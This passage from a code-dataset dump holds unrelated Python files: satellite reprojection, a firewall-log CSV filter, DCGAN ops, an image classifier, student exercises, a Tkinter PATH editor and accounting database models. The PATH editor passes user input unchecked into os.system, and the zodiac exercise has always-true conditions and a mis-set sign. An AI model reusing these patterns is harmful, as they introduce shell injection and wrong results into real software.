win_transaction[champ_index] = 1\n\n winning_champs_transaction_table.append(win_transaction)\n\nfor match in losing_champs:\n loss_transaction = [0] * number_of_champions\n\n for champ in match.get('losing_champions'):\n if champ not in transaction_table_ids_lookup:\n transaction_table_ids_lookup.append(champ)\n\n champ_index = transaction_table_ids_lookup.index(champ)\n loss_transaction[champ_index] = 1\n\n losing_champs_transaction_table.append(loss_transaction)\n\n# Write transactions to files\nwin_file = open('win_transactions.txt', 'w')\nwin_file_class = open('win_transactions_classifier.txt', 'w')\nprint(*[champ.replace(' ', '')\n for champ in transaction_table_ids_lookup], file=win_file)\nfor match in winning_champs_transaction_table:\n match_classifier = [*match, 1]\n print(*match, file=win_file)\n print(*match_classifier, file=win_file_class)\nwin_file.close()\nwin_file_class.close()\n\nloss_file = open('loss_transactions.txt', 'w')\nloss_file_class = open('loss_transactions_classifier.txt', 'w')\nprint(*[champ.replace(' ', '')\n for champ in transaction_table_ids_lookup], file=loss_file)\nfor match in losing_champs_transaction_table:\n match_classifier = [*match, -1]\n print(*match, file=loss_file)\n print(*match_classifier, file=loss_file_class)\nloss_file.close()\nloss_file_class.close()\n","sub_path":"database_scripts/champions_transactions.py","file_name":"champions_transactions.py","file_ext":"py","file_size_in_byte":3299,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"442204579","text":"########################################\r\n# GOES projection conversion to Lat/Lon\r\n# Function to be read in by other code\r\n#######################################\r\n\r\nimport pandas as pd\r\nimport numpy as np\r\nimport geopandas as gpd\r\nimport matplotlib.pyplot as plt\r\nimport os\r\nimport netCDF4 as nc\r\nfrom matplotlib.backends.backend_pdf import PdfPages\r\nimport cartopy.crs as ccrs\r\nimport cartopy\r\nimport cartopy.feature as cfeature\r\nimport matplotlib as mpl\r\n\r\n\r\ndef lat_lon_reproj(root,file):\r\n\tds = nc.Dataset(os.path.join(root, file))\r\n\t########################################\r\n\t# Designate dataset\r\n\t#######################################\r\n\tvar_names = [ii for ii in ds.variables]\r\n\tvar_name = var_names[0]\r\n\ttry:\r\n\t\tband_id = ds.variables['band_id'][:]\r\n\t\tband_id = ' (Band: {},'.format(band_id[0])\r\n\t\tband_wavelength = ds.variables['band_wavelength']\r\n\t\tband_wavelength_units = band_wavelength.units\r\n\t\tband_wavelength_units = '{})'.format(band_wavelength_units)\r\n\t\tband_wavelength = ' {0:.2f} '.format(band_wavelength[:][0])\r\n\t\tprint('Band ID: {}'.format(band_id))\r\n\t\tprint('Band Wavelength: {} {}'.format(band_wavelength,band_wavelength_units))\r\n\texcept:\r\n\t\tband_id = ''\r\n\t\tband_wavelength = ''\r\n\t\tband_wavelength_units = ''\r\n\t############################################################\r\n\t# GOES-R projection info and retrieving relevant constants\r\n\t############################################################\r\n\tproj_info = ds.variables['goes_imager_projection']\r\n\tlon_origin = proj_info.longitude_of_projection_origin\r\n\tH = proj_info.perspective_point_height+proj_info.semi_major_axis\r\n\tr_eq = proj_info.semi_major_axis\r\n\tr_pol = proj_info.semi_minor_axis\r\n\t########################################\r\n\t# grid info\r\n\t########################################\r\n\tlat_rad_1d = ds.variables['x'][:]\r\n\tlon_rad_1d = ds.variables['y'][:]\r\n\t########################################\r\n\t# data info\r\n\t########################################\r\n\tdata = ds.variables[var_name][:]\r\n\tdata_units = ds.variables[var_name].units\r\n\tdata_time_grab = ((ds.time_coverage_end).replace('T',' ')).replace('Z','')\r\n\tdata_long_name = ds.variables[var_name].long_name\r\n\t########################################\r\n\t# create meshgrid filled with radian angles\r\n\t########################################\r\n\tlat_rad,lon_rad = np.meshgrid(lat_rad_1d,lon_rad_1d)\r\n\t########################################\r\n\t# lat/lon calc routine from satellite radian angle vectors\r\n\t########################################\r\n\tlambda_0 = (lon_origin*np.pi)/180.0\r\n\t#\r\n\ta_var = np.power(np.sin(lat_rad),2.0) + (np.power(np.cos(lat_rad),2.0)*(np.power(np.cos(lon_rad),2.0)+(((r_eq*r_eq)/(r_pol*r_pol))*np.power(np.sin(lon_rad),2.0))))\r\n\tb_var = -2.0*H*np.cos(lat_rad)*np.cos(lon_rad)\r\n\tc_var = (H**2.0)-(r_eq**2.0)\r\n\t#\r\n\tr_s = (-1.0*b_var - np.sqrt((b_var**2)-(4.0*a_var*c_var)))/(2.0*a_var)\r\n\t#\r\n\ts_x = r_s*np.cos(lat_rad)*np.cos(lon_rad)\r\n\ts_y = - r_s*np.sin(lat_rad)\r\n\ts_z = r_s*np.cos(lat_rad)*np.sin(lon_rad)\r\n\t################################\r\n\t# Get Lat/Lon\r\n\t################################\r\n\tlat = (180.0/np.pi)*(np.arctan(((r_eq*r_eq)/(r_pol*r_pol))*((s_z/np.sqrt(((H-s_x)*(H-s_x))+(s_y*s_y))))))\r\n\tlon = (lambda_0 - np.arctan(s_y/(H-s_x)))*(180.0/np.pi)\r\n\t################################\r\n\t# Return vars\r\n\t################################\r\n\treturn lon,lat,data,data_units,data_time_grab,data_long_name,band_id,band_wavelength,band_wavelength_units,var_name, lat_rad, lon_rad, lat_rad_1d, lon_rad_1d","sub_path":"Single_file_plotting/GOES_LL_Conv.py","file_name":"GOES_LL_Conv.py","file_ext":"py","file_size_in_byte":3466,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"359605180","text":"#!/usr/bin/env python3\r\n\r\n### Copyright 2017 Adam Maynard\r\n### Licensed under the Apache License, Version 2.0 (the \"License\");\r\n### you may not use this file except in compliance with the License.\r\n### You may obtain a copy of the License at http://www.apache.org/licenses/LICENSE-2.0\r\n\r\n# Build for PAN-OS 8 (should work for 7 also)\r\n\r\n## Export Palo Alto threat log as csv, then use this to filter the junk\r\nimport pandas as pd, sys, argparse, os.path\r\n\r\nparser = argparse.ArgumentParser(description='-- Removes junk columns from Palo Alto traffic log exported as CSV. --- Example: \"py csv-filter-traffic.py -i C:\\\\traffic-log.csv -o .\" (\\'.\\' = cd)')\r\nparser.add_argument(\"-i\", \"--input\", help='input source csv file (with path)')\r\nparser.add_argument(\"-o\", \"--output\", help='output path to save the new csv file')\r\nargs = parser.parse_args()\r\n\r\nwinpath = args.input\r\nnewpath = args.output\r\ninfile = winpath.replace(\"\\\\\",\"/\")\r\nsavepath = newpath.replace(\"\\\\\",\"/\")\r\n\r\nf=pd.read_csv(infile)\r\nkeep_col = ['Receive Time','Source address','Destination address','Application','Repeat Count','Source Port','Destination Port','IP Protocol','Source Country','Destination Country']\r\nnew_f = f[keep_col]\r\nnew_f.to_csv(savepath + '/' + os.path.basename(infile.rsplit( \".\", 1 )[ 0 ]) + \"-traffic.csv\", index=False)","sub_path":"csv-filter-traffic.py","file_name":"csv-filter-traffic.py","file_ext":"py","file_size_in_byte":1304,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"633073422","text":"import math\nimport numpy as np \nimport tensorflow as tf\n\nfrom tensorflow.python.framework import ops\n\nfrom utils import *\n#定义了一堆变量:image_summary 、scalar_summary、histogram_summary、merge_summary、SummaryWriter,都是从相应的tensorflow中获取的。如果可是直接获取,则获取,否则从tf.summary中获取。\ntry:\n image_summary = tf.image_summary\n scalar_summary = tf.scalar_summary\n histogram_summary = tf.histogram_summary\n merge_summary = tf.merge_summary\n SummaryWriter = tf.train.SummaryWriter\nexcept:\n image_summary = tf.summary.image\n scalar_summary = tf.summary.scalar\n histogram_summary = tf.summary.histogram\n merge_summary = tf.summary.merge\n SummaryWriter = tf.summary.FileWriter\n#用来拼接多个tensor\n'''\n利用dir(tf)判断”concat_v2”是否在里面,如果在的话,定义一个concat(tensors, axis, *args, **kwargs)函数,并返回tf.concat_v2(tensors, axis, *args, **kwargs);否则也定义concat(tensors, axis, *args, **kwargs)函数,只不过返回的是tf.concat(tensors, axis, *args, **kwargs)。其中,tf.concat使用如下:\n\nt1=tf.constant([[1,2,3],[4,5,6]])\nt2=tf.constant([[7,8,9],[10,11,12]])\nt3=tf.concat([t1,t2],0)\nt4=tf.concat([t1,t2],1)\nprint t1\nprint t2\nprint t3\nprint t4\n'''\nif \"concat_v2\" in dir(tf):\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat_v2(tensors, axis, *args, **kwargs)\nelse:\n def concat(tensors, axis, *args, **kwargs):\n return tf.concat(tensors, axis, *args, **kwargs)\n#定义一个batch_norm类,包含两个函数init和call函数。首先在init(self, epsilon=1e-5, momentum = 0.9, name=”batch_norm”)函数中,定义一个name参数名字的变量,初始化self变量epsilon、momentum 、name。在call(self, x, train=True)函数中,利用tf.contrib.layers.batch_norm函数批处理规范化。\nclass batch_norm(object):\n def __init__(self, epsilon=1e-5, momentum = 0.9, name=\"batch_norm\"):\n with tf.variable_scope(name):\n self.epsilon = epsilon\n self.momentum = momentum\n self.name = name\n\n def __call__(self, x, train=True):\n return tf.contrib.layers.batch_norm(x,\n decay=self.momentum, \n updates_collections=None,\n epsilon=self.epsilon,\n scale=True,\n is_training=train,\n scope=self.name)\n#连接x,y与Int32型的[x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]]维度的张量乘积。\ndef conv_cond_concat(x, y):\n \"\"\"Concatenate conditioning vector on feature map axis.\"\"\"\n x_shapes = x.get_shape()\n y_shapes = y.get_shape()\n return concat([\n x, y*tf.ones([x_shapes[0], x_shapes[1], x_shapes[2], y_shapes[3]])], 3)\n#定义conv2d(input_, output_dim, k_h=5, k_w=5, d_h=2,d_w=2, stddev=0.02,name=”conv2d”)函数。卷积函数:获取随机正态分布权值、实现卷积、获取初始偏置值,获取添加偏置值后的卷积变量并返回。\ndef conv2d(input_, output_dim, \n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"conv2d\"): \n #定义conv2节点:随机初始化W,\n # filter: [height, width, output_channels, in_channels]\n #W的shape为[5 5 input[-1] output_dim]\n #卷积在每一维的步长[1 2 2 1]\n #padding='SAME'时:output size(h,w) = input(h,w)/stride = input(h,w)/2\n with tf.variable_scope(name):\n w = tf.get_variable('w', [k_h, k_w, input_.get_shape()[-1], output_dim],\n initializer=tf.truncated_normal_initializer(stddev=stddev))\n conv = tf.nn.conv2d(input_, w, strides=[1, d_h, d_w, 1], padding='SAME')\n #biase 舒适化为 0\n biases = tf.get_variable('biases', [output_dim], initializer=tf.constant_initializer(0.0))\n conv = tf.reshape(tf.nn.bias_add(conv, biases), conv.get_shape())\n\n return conv\n#反卷积函数:获取随机正态分布权值、解卷积,获取初始偏置值,获取添加偏置值后的卷积变量,判断with_w是否为真,真则返回解卷积、权值、偏置值,否则返回解卷积。\ndef deconv2d(input_, output_shape,\n k_h=5, k_w=5, d_h=2, d_w=2, stddev=0.02,\n name=\"deconv2d\", with_w=False):\n with tf.variable_scope(name):\n # filter : [height, width, output_channels, in_channels]\n #初始化W W shape:[5 5 output_shape input size[-1]]注意:此处output size与input size与conv2是不同的,原因应该与tf的conv2实现内部实现有关系,暂时不清楚\n # W b 都是可以共享的,之后会与sampler共享\n w = tf.get_variable('w', [k_h, k_w, output_shape[-1], input_.get_shape()[-1]],\n initializer=tf.random_normal_initializer(stddev=stddev))\n #因为版本问题尝试使用conv2d_transpose,出现错误,使用deconv2d实现反卷积\n #反卷积与卷积的filter矩阵正好是转至关系\n try:\n deconv = tf.nn.conv2d_transpose(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n\n # Support for verisons of TensorFlow before 0.7.0\n except AttributeError:\n deconv = tf.nn.deconv2d(input_, w, output_shape=output_shape,\n strides=[1, d_h, d_w, 1])\n #偏差使用0初始化\n biases = tf.get_variable('biases', [output_shape[-1]], initializer=tf.constant_initializer(0.0))\n deconv = tf.reshape(tf.nn.bias_add(deconv, biases), deconv.get_shape())\n \n if with_w:\n return deconv, w, biases\n else:\n return deconv\n#leaky relu函数定义 \ndef lrelu(x, leak=0.2, name=\"lrelu\"):\n return tf.maximum(x, leak*x)\n#进行线性运算,获取一个随机正态分布矩阵,获取初始偏置值,如果with_w为真,则返回xw+b,权值w和偏置值b;否则返回xw+b。\n#第一项参数为input,第二项参数为output size\ndef linear(input_, output_size, scope=None, stddev=0.02, bias_start=0.0, with_w=False):\n #获取input size\n shape = input_.get_shape().as_list()\n\n with tf.variable_scope(scope or \"Linear\"):\n #根据input size 和output size,以及stddev正态初始化矩阵matrix即W\n matrix = tf.get_variable(\"Matrix\", [shape[1], output_size], tf.float32,\n tf.random_normal_initializer(stddev=stddev))\n #根据output size,初始化biase,初始化的值由linear的参数bias_start决定\n bias = tf.get_variable(\"bias\", [output_size],\n initializer=tf.constant_initializer(bias_start))\n #由参数with_w来判定是否要返回w及b\n if with_w:\n return tf.matmul(input_, matrix) + bias, matrix, bias\n else:\n return tf.matmul(input_, matrix) + bias\n","sub_path":"DCGAN-tensorflow-master_notes/ops.py","file_name":"ops.py","file_ext":"py","file_size_in_byte":6562,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"574604694","text":"import sys\nimport numpy as np\nimport cv2\n\nroot = \"image/{}\"\nimgName = [\"beagle.jpg\",\"cup.jpg\",\"pineapple.jpg\",\"scooter.jpg\",\"space_shuttle.jpg\"]\n\nimgs = []\nfor n in imgName :\n img = cv2.imread(root.format(n))\n\n if img is None :\n print(\"Image load failed\")\n sys.exit()\n\n imgs.append(img)\n\n\n# model = \"dnn/bvlc_googlenet.caffemodel\"\n# config = \"dnn/deploy.prototxt\"\n\nmodel = \"dnn/googlenet-9.onnx\"\nconfig = \"\"\n\nmodelName = None \nwith open(\"dnn/classification_classes_ILSVRC2012.txt\") as f :\n modelName = f.read().rstrip(\"\\n\").split(\"\\n\")\n\nnet = cv2.dnn.readNet(model,config)\nfor img in imgs :\n blob = cv2.dnn.blobFromImage(img,1,(224,224),(104,117,123))\n net.setInput(blob)\n out = net.forward()\n idx = np.argmax(out)\n\n name = modelName[idx]\n prob = round(out[0][idx] * 100,2)\n\n cv2.putText(img, str(name)+\" \"+str(prob)+\"%\", (10,30), cv2.FONT_HERSHEY_SIMPLEX, 1, (0,0,255),1,cv2.LINE_AA)\n\n cv2.imshow('img', img)\n cv2.waitKey()\ncv2.destroyAllWindows()\n\n","sub_path":"11.딥러닝 이해와 영상 인식/2_googlenet.py","file_name":"2_googlenet.py","file_ext":"py","file_size_in_byte":1003,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"249720206","text":"######################################################################\n# Author: Taran Wells\n# Username: wellst\n#\n# Assignment: A01\n#\n# Purpose: A program that returns your Chinese Zodiac animal given a\n# birth year between 1988 and 1999. Also prints your friend's animal,\n# and your compatibility with that friend's animal.\n######################################################################\n# Acknowledgements:\n# Original Author: Dr. Scott Heggen\n######################################################################\n\n# Remember to read the detailed notes about each task in the A01 document.\n\n######################################################################\n# (Required) Task 1\n# TODO Ask user for their birth year\nglobal user_sign\nglobal friend_sign\nuser_year = int(input(\"What is your birth year? \" ))\n\n# TODO Check the year using if conditionals, and print the correct animal for that year.\n# See the a01_pets.py for examples\nif user_year == 1972 or user_year == 1984 or user_year == 1996 or user_year == 2008:\n user_sign = 1\n print(\"You are a Rat! \\n\")\nelif user_year == 1973 or user_year == 1985 or user_year == 1997 or user_year == 2009:\n user_sign = 2\n print(\"You are an Ox! \\n\")\nelif user_year == 1974 or user_year == 1986 or user_year == 1998 or user_year == 2010:\n user_sign = 3\n print(\"You are a Tiger! \\n\")\nelif user_year == 1975 or user_year == 1987 or user_year == 1999 or user_year == 2011:\n user_sign = 4\n print(\"You are a Rabbit! \\n\")\nelif user_year == 1976 or user_year == 1988 or user_year == 2000 or user_year == 2012:\n user_sign = 5\n print(\"You are a Dragon! \\n\")\nelif user_year == 1977 or user_year == 1989 or user_year == 2001 or user_year == 2013:\n user_sign = 6\n print(\"You are a Snake! \\n\")\nelif user_year == 1978 or user_year == 1990 or user_year == 2002 or user_year == 2014:\n user_sign = 7\n print(\"You are a Horse! \\n\")\nelif user_year == 1979 or user_year == 1991 or user_year == 2003 or user_year == 2015:\n user_sign = 8\n print(\"You are a Goat! \\n\")\nelif user_year == 1980 or user_year == 1992 or user_year == 2004 or user_year == 2016:\n user_sign = 9\n print(\"You are a Monkey! \\n\")\nelif user_year == 1981 or user_year == 1993 or user_year == 2005 or user_year == 2017:\n user_sign = 10\n print(\"You are a Rooster! \\n\")\nelif user_year == 1982 or user_year == 1994 or user_year == 2006 or user_year == 2018:\n user_sign = 11\n print(\"You are a Dog! \\n\")\nelif user_year == 1983 or user_year == 1995 or user_year == 2007 or user_year ==2019:\n user_sign = 12\n print(\"You are a Pig! \\n\")\n######################################################################\n# (Required) Task 2\n# TODO Ask the user for their friend's birth year\nfriend_year = int(input(\"What is your friend's birth year?\"))\n# TODO Similar to above, check your friend's year using if conditionals, and print the correct animal for that year\nif friend_year == 1972 or friend_year == 1984 or friend_year == 1996 or friend_year == 2008:\n friend_sign = 1\n print(\"Your friend is a Rat! \\n\")\nelif friend_year == 1973 or friend_year == 1985 or friend_year == 1997 or friend_year == 2009:\n friend_sign = 2\n print(\"Your friend is an Ox! \\n\")\nelif friend_year == 1974 or friend_year == 1986 or friend_year == 1998 or friend_year == 2010:\n friend_sign = 3\n print(\"Your friend is a Tiger! \\n\")\nelif friend_year == 1975 or friend_year == 1987 or friend_year == 1999 or friend_year == 2011:\n friend_sign = 4\n print(\"Your friend is a Rabbit! \\n\")\nelif friend_year == 1976 or friend_year == 1988 or friend_year == 2000 or friend_year == 2012:\n friend_sign = 5\n print(\"Your friend is is a Dragon! \\n\")\nelif friend_year == 1977 or friend_year == 1989 or friend_year == 2001 or friend_year == 2013:\n friend_sign = 6\n print(\"Your friend is a Snake! \\n\")\nelif friend_year == 1978 or friend_year == 1990 or friend_year == 2002 or friend_year == 2014:\n friend_sign = 7\n print(\"Your friend is a Horse! \\n\")\nelif friend_year == 1979 or friend_year == 1991 or friend_year == 2003 or friend_year == 2015:\n friend_sign = 8\n print(\"Your friend is a Goat! \\n\")\nelif friend_year == 1980 or friend_year == 1992 or friend_year == 2004 or friend_year == 2016:\n friend_sign = 9\n print(\"Your friend is a Monkey! \\n\")\nelif friend_year == 1981 or friend_year == 1993 or friend_year == 2005 or friend_year == 2017:\n friend_sign = 10\n print(\"Your friend is a Rooster! \\n\")\nelif friend_year == 1982 or friend_year == 1994 or friend_year == 2006 or friend_year == 2018:\n friend_sign = 1\n print(\"Your friend is a Dog! \\n\")\nelif friend_year == 1983 or friend_year == 1995 or friend_year == 2007 or friend_year == 2019:\n friend_sign = 12\n print(\"Your friend is a Pig! \\n\")\n######################################################################\n# (Optional) Task 3\n# TODO Check for compatibility between your birth year and your friend's birth year\n# NOTE: You can always assume the first input is your birth year.\n# This way, you are not writing a ton of code to consider every possibility.\n# In other words, only do one row of the sample compatibility table.\nif user_sign == 1:\n if friend_sign == 1 or 5 or 9:\n print(\"You two are a great match!\")\n elif friend_sign == 2 or 3 or 4 or 6 or 8 or 10 or 11 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 7:\n print(\"You two are not a match!\")\nelif user_sign == 2:\n if friend_sign == 1 or 3 or 4 or 5 or 7 or 9 or 11 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 2 or 6 or 10:\n print(\"You two are a great match!\")\n elif friend_sign == 8:\n print(\"You two are not a match!\")\nelif user_sign == 3:\n if friend_sign == 1 or 2 or 4 or 5 or 6 or 8 or 10 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 3 or 7 or 11:\n print(\"You two are a great match!\")\n elif friend_sign == 9:\n print(\"You two are not a match!\")\nelif user_sign == 4:\n if friend_sign == 1 or 2 or 3 or 5 or 6 or 7 or 9 or 11:\n print(\"You two are a match!\")\n elif friend_sign == 4 or 8 or 12:\n print(\"You two are a great match!\")\n elif friend_sign == 10:\n print(\"You two are not a match!\")\nelif user_sign == 5:\n if friend_sign == 1 or 5 or 9:\n print(\"You two are a great match!\")\n elif friend_sign == 2 or 3 or 4 or 6 or 7 or 8 or 10 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 11:\n print(\"You two are not a match!\")\nelif user_sign == 6:\n if friend_sign == 1 or 3 or 4 or 5 or 7 or 8 or 9 or 11:\n print(\"You two are a match!\")\n elif friend_sign == 2 or 6 or 10:\n print(\"You two are a great match!\")\n elif friend_sign == 12:\n print(\"You two are not a match!\")\nelif user_sign == 7:\n if friend_sign == 1:\n print(\"You two are not a match!\")\n elif friend_sign == 2 or 4 or 5 or 6 or 8 or 9 or 10 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 3 or 11 or 7:\n print(\"You two are a great match!\")\nelif user_sign == 8:\n if friend_sign == 1 or 3 or 5 or 6 or 7 or 9 or 10 or 11:\n print(\"You two are a match!\")\n elif friend_sign == 2:\n print(\"You two are not a match!\")\n elif friend_sign == 4 or 8 or 12:\n print(\"You two are a great match!\")\nelif user_sign == 9:\n if friend_sign == 1 or 5 or 9:\n print(\"You two are a great match!\")\n elif friend_sign == 2 or 4 or 6 or 7 or 8 or 10 or 11 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 3:\n print(\"You two are not a match!\")\nelif user_sign == 10:\n if friend_sign == 1 or 3 or 5 or 7 or 8 or 9 or 11 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 2 or 6 or 10:\n print(\"You two are a great match!\")\n elif friend_sign == 4:\n print(\"You two are not a match!\")\nelif user_sign == 11:\n if friend_sign == 1 or 2 or 4 or 6 or 8 or 9 or 10 or 12:\n print(\"You two are a match!\")\n elif friend_sign == 3 or 7 or 11:\n print(\"You two are a great match!\")\n elif friend_sign == 5:\n print(\"You two are not a match!\")\nelif user_sign == 12:\n if friend_sign == 1 or 2 or 3 or 5 or 7 or 9 or 10 or 11:\n print(\"You two are a match!\")\n elif friend_sign == 4 or 8 or 12:\n print(\"You two are a great match!\")\n elif friend_sign == 6:\n print(\"You two are not a match!\")\n# TODO print if you are a strong match, no match, or in between\n","sub_path":"a01_stubs.py","file_name":"a01_stubs.py","file_ext":"py","file_size_in_byte":8490,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"316936208","text":"\"\"\"\nLab 4:\n\"\"\"\n\ndef main():\n price = get_ticket_price(5, 20, True, False)\n print(\"$\" + str(price))\n print(\"$\" + str(get_ticket_price(5, 20, False, True)))\n print(\"$\" + str(get_ticket_price(5, 20, False, False)))\n print(\"$\" + str(get_ticket_price(15, 25, False, True)))\n\ndef get_ticket_price(number_of_tickets, ticket_price, has_discount, is_a_member):\n total_price = number_of_tickets * ticket_price\n if has_discount and is_a_member:\n end_price = round(0.8 * total_price)\n return end_price\n elif has_discount:\n end_price = round(0.85 * total_price)\n return end_price\n elif is_a_member:\n end_price = round(0.9 * total_price)\n return end_price\n else:\n return total_price\n return\n\nmain()\n\n\n\n\n\n\n\n\n","sub_path":"Lab 4 Q2.py","file_name":"Lab 4 Q2.py","file_ext":"py","file_size_in_byte":775,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"124859957","text":"import sys\nsys.path.append('C:\\\\Users\\\\ZFY\\\\PycharmProjects\\\\AutoFE')\nsys.path.append('/home/zhangyanfeng/AutoFE')\n# sys.path.append('/Users/mac/PycharmProjects/AutoFE')\nsys.path.append('/GPUFS/ecnu_cqjin_caipeng/AutoFE')\nfrom related_work.RL_AAAI_2018.env.TitanicEnv import TitanicEnv\nfrom related_work.RL_AAAI_2018.agent.agent import DQNAgent\nimport warnings\nfrom utils import init_seed\nwarnings.filterwarnings('ignore')\n\nif __name__ == \"__main__\":\n init_seed.init_seed()\n\n env = TitanicEnv(5)\n load_name = 'Titanic'\n\n num_frames = 50000\n memory_size = 1000\n batch_size = 64\n target_update = 200\n epsilon_decay = 1 / 10000\n\n agent = DQNAgent(env, memory_size, batch_size, target_update, epsilon_decay, load_name, True)\n\n agent.train(num_frames)\n","sub_path":"related_work/RL_AAAI_2018/titanic.py","file_name":"titanic.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"311350287","text":"import os\nimport sys\nfrom tkinter import *\nfrom tkinter import ttk\n \nroot = Tk()\nroot.title(\"AddToPath\")\nroot.resizable(False,False)\n\naddinginfo = StringVar()\naddinginfo.set(\"Enter path and click Add button\")\ndef addtopath(*args):\n try:\n os.system(\"touch ~/.bash_profile\")\n pathvalue = str(topath.get())\n addinginfo.set(str(\"Loading BASH...\"))\n command = \"export PATH=$PATH:\"\n fullcommand = command + pathvalue\n addinginfo.set(str(\"Adding the path to your mac PATH...\"))\n os.system(fullcommand)\n os.system(\"source $HOME/.bash_profile\")\n addinginfo.set(str(\"Successful!\"))\n except ValueError:\n addinginfo.set(str(\"Adding to PATH error!\"))\n pass\n\nmainframe = ttk.Frame(root,width=30, padding=\"3 3 12 12\")\nmainframe.grid(column=0, row=0, sticky=(N, W, E, S))\nmainframe.columnconfigure(0, weight=1)\nmainframe.rowconfigure(0, weight=1)\n\ntopath = StringVar()\nshowallpaths = StringVar()\n\nfeet_entry = ttk.Entry(mainframe,width=25, textvariable=topath)\nfeet_entry.grid(column=1, row=1, sticky=(W))\n\nttk.Button(mainframe, text=\"Add\",width=5, command=addtopath).grid(column=1, row=1, sticky=E)\npathslistbox = Listbox(mainframe,width=30, height=10)\npathslistbox.grid(column=1, row=3, sticky=(W,E))\nttk.Sizegrip().grid(column=1, row= 3, sticky=(S,E))\n\n \nttk.Label(mainframe, textvariable=addinginfo).grid(column=1, row=2, sticky=(W,E))\n\nallpaths = str(os.popen(\"echo $PATH\").readlines()[0])\nlistforpaths = allpaths.split(':')\n\nif len(listforpaths) > 10:\n s = ttk.Scrollbar(pathslistbox, orient=VERTICAL, command=pathslistbox.yview)\n s.grid(column=1, row=3, sticky=(N,S))\n pathslistbox['yscrollcommand'] = s.set\n\nfor i in listforpaths:\n pathslistbox.insert('end',i)\n\nroot.mainloop()","sub_path":"topath.py","file_name":"topath.py","file_ext":"py","file_size_in_byte":1771,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"15"} +{"seq_id":"586973002","text":"# Copyright (c) 2016, AB Uobis\n# All rights reserved.\n\nfrom xac import db\nfrom sqlalchemy.dialects.postgresql import JSON\nfrom sqlalchemy import BigInteger\n\n\n# Memoranda are source documents from which accounting information is extracted to form General Journal entries. As a preliminary step, all of the details for each individual transaction are extracted from the source document to a dictionary.\n\n\nclass Memoranda(db.Model):\n id = db.Column(db.Text, primary_key=True)\n date = db.Column(db.DateTime, index=True)\n fileName = db.Column(db.Text, unique=True)\n fileType = db.Column(db.Text)\n fileSize = db.Column(BigInteger)\n fileText = db.Column(db.Text)\n\nclass MemorandaTransactions(db.Model):\n id = db.Column(db.Text, primary_key=True)\n txid = db.Column(db.Text)\n details = db.Column(JSON) # Replace (db.Text) with (JSON) for pg\n memoranda_id = db.Column(db.Text, db.ForeignKey('memoranda.id'))\n\nclass BitcoinTransactions(db.Model):\n # txid of the bitcoins received\n txid = db.Column(db.Text, primary_key=True)\n # output index of the bitcoins received\n output_index = db.Column(db.Integer, primary_key=True)\n # address the bitcoins were received with\n output_address = db.Column(db.Text)\n amount = db.Column(BigInteger)\n unspent = db.Column(db.Boolean)\n last_updated = db.Column(db.DateTime)\n memoranda_transactions_id = db.Column(db.Text, db.ForeignKey('memoranda_transactions.id'))\n\nclass Elements(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n classifications = db.relationship('Classifications', backref='element', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n\nclass Classifications(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n parent = db.Column(db.Text, db.ForeignKey('elements.name'))\n accounts = db.relationship('Accounts', backref='classification', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n \nclass Accounts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n parent = db.Column(db.Text, db.ForeignKey('classifications.name'))\n subaccounts = db.relationship('Subaccounts', backref='account', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n\nclass Subaccounts(db.Model):\n id = db.Column(db.Integer, primary_key=True)\n name = db.Column(db.Text, unique=True)\n parent = db.Column(db.Text, db.ForeignKey('accounts.name'))\n ledgerentries = db.relationship('LedgerEntries', backref='subaccount', lazy='select', cascade=\"save-update, merge, delete\")\n \n def __repr__(self):\n return self.name\n\nclass JournalEntries(db.Model):\n id = db.Column(db.Text, primary_key=True)\n memoranda_transactions_id = db.Column(db.Text, db.ForeignKey('memoranda_transactions.id'))\n ledgerentries = db.relationship('LedgerEntries', backref='journalentry', lazy='select', cascade=\"save-update, merge, delete\", order_by=\"desc(LedgerEntries.tside), desc(LedgerEntries.amount)\")\n\nclass LedgerEntries(db.Model):\n id = db.Column(db.Text, primary_key=True)\n date = db.Column(db.DateTime)\n tside = db.Column(db.Text)\n amount = db.Column(db.Numeric)\n currency = db.Column(db.Text)\n ledger = db.Column(db.Text, db.ForeignKey('subaccounts.name'))\n journal_entry_id = db.Column(db.Text, db.ForeignKey('journal_entries.id'))\n\nclass PriceFeeds(db.Model):\n price_id = db.Column(db.Integer, primary_key=True)\n timestamp = db.Column(db.BigInteger)\n price = db.Column(db.Numeric)\n volume = db.Column(db.Numeric)\n\nclass Rates(db.Model):\n date = db.Column(db.BigInteger, primary_key=True)\n source = db.Column(db.Text)\n currency = db.Column(db.Text)\n rate = 